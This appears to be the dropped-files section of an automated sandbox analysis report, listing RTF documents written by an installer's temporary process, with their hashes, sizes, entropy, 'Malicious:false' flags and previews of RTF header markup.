                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45730
                                                                                                                                                                                                                                                          Entropy (8bit):5.0380816279242895
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXQUx1e8Ca9DGi3w2EHnT2njX8x3FA5xr7YZhZOZiZFs7tAZkjCfbH1Yvv71KDH:qqAGeCIA9+
                                                                                                                                                                                                                                                          MD5:BDBE095C7A0E96988B0CF67900DC1BEA
                                                                                                                                                                                                                                                          SHA1:D2FDD08E37CDD417C3CD03A0432CDD50405DA76D
                                                                                                                                                                                                                                                          SHA-256:EA0ADE471AA7488DF2B2589410D86472EDDDEC744B1F61ADE5347E9E3A297DD9
                                                                                                                                                                                                                                                          SHA-512:87C1513C522958F71339D363324B0B5A439E090478D5D235444E329CCB611ED88B8AA186BBFA91B3D4DC576022CD62AEBC2019149A80073BF6CE37670EC4ACAD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pa
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39892
                                                                                                                                                                                                                                                          Entropy (8bit):5.034602521621446
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akrOc7jgskl7rVGG1ZoQZq4sMQi1y9k1IKWhlmdBMyiX4+0Aw:2aFknOc7cskl/VGG1iMN+0dZ/6A9v
                                                                                                                                                                                                                                                          MD5:D947033057D3BCAF28277A8071817DB8
                                                                                                                                                                                                                                                          SHA1:901824B565296E552D80E934D8A2F39369611F86
                                                                                                                                                                                                                                                          SHA-256:B8A385017A5AD17D0584EB61350466CD453CA521B282F195CA0AF0971621BFB2
                                                                                                                                                                                                                                                          SHA-512:92ACB02795C228F72BF64ED33A55B6DB6D4222786B32FA0A67A6A55D53F6D851BC6659CCA4341FDECD6BF0B48E5CAC7D1A437A26927F790A57436C5AAFA1877B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39483
                                                                                                                                                                                                                                                          Entropy (8bit):5.037147955886456
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akrOc7jgskl7rVGGASZqeY4sMQi1OkBSyAQdAMeo75Y3kpTBd:2aFknOc7cskl/VGGAS0MDAJZ/6A9S
                                                                                                                                                                                                                                                          MD5:2A08EEECD3328F25905421850E9182BE
                                                                                                                                                                                                                                                          SHA1:EC931D459DAD71B222442AA00412E1E627F343E2
                                                                                                                                                                                                                                                          SHA-256:F7F40C10AE7B09FB3D476FCEA2E2FC7CCA8DF57EE92899A1675B4A1B7D61749D
                                                                                                                                                                                                                                                          SHA-512:D1F92F97F9B9F560A0FC510567A63B8A150759DCE4E25F0AA7B302537E3745FFA9722C144D1FF09308E7F131E92AD1CD5CB91C21B21ECE8B62E7A90B85911C10
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44558
                                                                                                                                                                                                                                                          Entropy (8bit):5.049062407758663
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsc5NcTF4BaVy3F1+1h1r1KDZ/6A9L:2amAhcWF4BaA3F1+1h1r1KDIA9L
                                                                                                                                                                                                                                                          MD5:16036186160BEB81F13561AE51DCFBED
                                                                                                                                                                                                                                                          SHA1:BB644BD11DABCC9F453A71745D7CF12A1621FEBA
                                                                                                                                                                                                                                                          SHA-256:AE0674BF9ECDCD8A1550E0ECA0529EED66E9786B6029AE6EB5414769205FDAA2
                                                                                                                                                                                                                                                          SHA-512:CEDAD90055D3DE40A431B0FF9FA89D9E2A25E831EC484854F01E04CC953EBBD50D76B23107C5D1446145A4596A721EEBB34B6EFF827C623D894924BEB64B8DA2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48084
                                                                                                                                                                                                                                                          Entropy (8bit):5.035611454104282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jfDCcJJrNgVVhGPNhHwGNjm+epnq/x7yjxNQwr8AUmQryuj8QDc3n3g3x:qqJ9aqbIA9b
                                                                                                                                                                                                                                                          MD5:EF57D23344C66880C6A38F743FD3FF0E
                                                                                                                                                                                                                                                          SHA1:FC336BCC92580A0D367CB5B3604EE0040CC08492
                                                                                                                                                                                                                                                          SHA-256:E36C9442648C0564C6AD9AC6074EC2B5023BBEBF291708977714AD977DDC1633
                                                                                                                                                                                                                                                          SHA-512:C336736ADD43033E4BEA538EDAD809127C1ECF80DA20FCD3E02065E310919529E44C5CF57D0FD24EA295FAE367BFE7F7C52465E18863D0B2AF37188EA069502F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44859
                                                                                                                                                                                                                                                          Entropy (8bit):5.042653911286004
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jfDCcJJrNgVVhGPNhHwGNjm+epnqdxBBdwwZxsAUtcGuermSShpHlfcXX:qqJ9aqMIA9Z
                                                                                                                                                                                                                                                          MD5:0692A56E310ADDB8AB518DFF420373E6
                                                                                                                                                                                                                                                          SHA1:1855B76BA5A77F96D7ED04FECD78342BB3902517
                                                                                                                                                                                                                                                          SHA-256:821D367CFEC38EEB7BFC2635ECC1B8938802D5D4071AFFA380BF5D3DA32BBA8A
                                                                                                                                                                                                                                                          SHA-512:FE0C99F78A2807F06ECE7E94CFD9EBAD74E65FE2E9A8619D1EB3FD9CA68FA1F80AEA29D7FE1CD0AA7CEC6DD0404070E99FBD1B14DE5409CAB94703B2C679083C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36597
                                                                                                                                                                                                                                                          Entropy (8bit):5.030646060695953
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4FkNx1ETicPI0QhhiLV9E8cvtsomvimZ/6A9Q:q4GVUnXIA9Q
                                                                                                                                                                                                                                                          MD5:4C157CB3C17D248D1CE74DB9A506CBBC
                                                                                                                                                                                                                                                          SHA1:E8786D856D7F9A33E841A2C4BDF4BA41E8153448
                                                                                                                                                                                                                                                          SHA-256:78E2AD2864EE4FA19DF5149FA7C86F4937FECDC48B0AC7965B9332706A356F87
                                                                                                                                                                                                                                                          SHA-512:BA3C0F19E6B41C82021B4B0A00D9177F44D9341C5F26226258AEAC93DD46622C55C50ED284F5B8CD6DEBAF52C35B55720732C0FF9D86961E55648E2182D358DC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49574
                                                                                                                                                                                                                                                          Entropy (8bit):5.031691924230754
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:4qFys4jeDCcJ+r15g5V5V5h5G5P5N5hBcqtqYepn3/xXdQQMQs2YMKBX49nNbaEq:4qYo3CtU7c7KIA9m
                                                                                                                                                                                                                                                          MD5:AEE08B8B9A32D64F630D57580A2D4457
                                                                                                                                                                                                                                                          SHA1:0BD2511BF3C71E549858E1990A07CA29A11A9C8D
                                                                                                                                                                                                                                                          SHA-256:468D9AA761B58B6CCA9C93C271D3B9A3EC96D367019CA53F0579E3A5E87720FE
                                                                                                                                                                                                                                                          SHA-512:16CE81CF5D2A1910E845DC857AEC389ADB9E2A05E262DD47F4285A5BF5EE9A522622484EC9CE875089B1526B0C0A5956A66B858A6A731F33F2BDE6E1FE130A71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff-10\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):96477
                                                                                                                                                                                                                                                          Entropy (8bit):4.924667312566969
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4FkIxd/+zl3C79ka9aT2njX8x3fj5g5V5V5h5G5P5N585gVVhGPN9turfTYlD+N:q4pfLS7tFvIA9AA
                                                                                                                                                                                                                                                          MD5:474EFD092A23625D32003FF87FF3453A
                                                                                                                                                                                                                                                          SHA1:1BD49C74CD6DC150858759546E8C8B7A49F12288
                                                                                                                                                                                                                                                          SHA-256:8AEAD04008796E39C04E7E0F99B5824387C416B5C2A0EFF01A9FE5881959F382
                                                                                                                                                                                                                                                          SHA-512:3BED2B0372293ECDF4798D223917556E358EF8AB686D53519EAF6310329FF4B89FB26FA08F42A77D2B16C2065218B9EE746D9D126683CEA19ADAF83172895127
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45730
                                                                                                                                                                                                                                                          Entropy (8bit):5.0380816279242895
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXQUx1e8Ca9DGi3w2EHnT2njX8x3FA5xr7YZhZOZiZFs7tAZkjCfbH1Yvv71KDH:qqAGeCIA9+
                                                                                                                                                                                                                                                          MD5:BDBE095C7A0E96988B0CF67900DC1BEA
                                                                                                                                                                                                                                                          SHA1:D2FDD08E37CDD417C3CD03A0432CDD50405DA76D
                                                                                                                                                                                                                                                          SHA-256:EA0ADE471AA7488DF2B2589410D86472EDDDEC744B1F61ADE5347E9E3A297DD9
                                                                                                                                                                                                                                                          SHA-512:87C1513C522958F71339D363324B0B5A439E090478D5D235444E329CCB611ED88B8AA186BBFA91B3D4DC576022CD62AEBC2019149A80073BF6CE37670EC4ACAD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pa
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50474
                                                                                                                                                                                                                                                          Entropy (8bit):5.02065375573397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fk5e0/qCdXF2njX8x3l7G5V5V5h5G5P5N58JCxCIWC3/OpfVPV0VVqrHLLA2YG:q4bdAc8IA9+
                                                                                                                                                                                                                                                          MD5:9796F2ACB16A082E1398FF7EB812FBF6
                                                                                                                                                                                                                                                          SHA1:3D0439006944B32BA2864A66D50F7BB30857548B
                                                                                                                                                                                                                                                          SHA-256:ACBF9B9D0150B9371E4FC0609F119C77E28F9999F6D30FEE0F1665F6A1116354
                                                                                                                                                                                                                                                          SHA-512:AA0C265F319ED1193E474D23A793C53A697D44B29806EF6EDA7FABF83C597E45F49076D97DB919EC897E9257FCD41AB560A91E50D77EE6148FBA8A6D695DCE8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56800
                                                                                                                                                                                                                                                          Entropy (8bit):4.971134438284621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqe+2VXLHT2njX8x3TLjwUtqYepAkVZEdvI9DhLVtKAn1+kxATfpyuqFnZ8MSqi7:qqqkhLVvIA9S
                                                                                                                                                                                                                                                          MD5:3B8361BD47C4A33C6753ABF66E840953
                                                                                                                                                                                                                                                          SHA1:F47CF562955DAD89D07730162B53A778A9F72AD4
                                                                                                                                                                                                                                                          SHA-256:81FA4579AC6CA95049C34F47439231BE533173F12A63187779B6F3762F648679
                                                                                                                                                                                                                                                          SHA-512:CA1EBC99A888904B1BF43144C75F58FA4A3F2143FB00341E0EEA61B05CDD60E02F7527E4822144A082321CF2C93EEB8F395EA22295B0D3D9EBCBE9D32CE90456
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
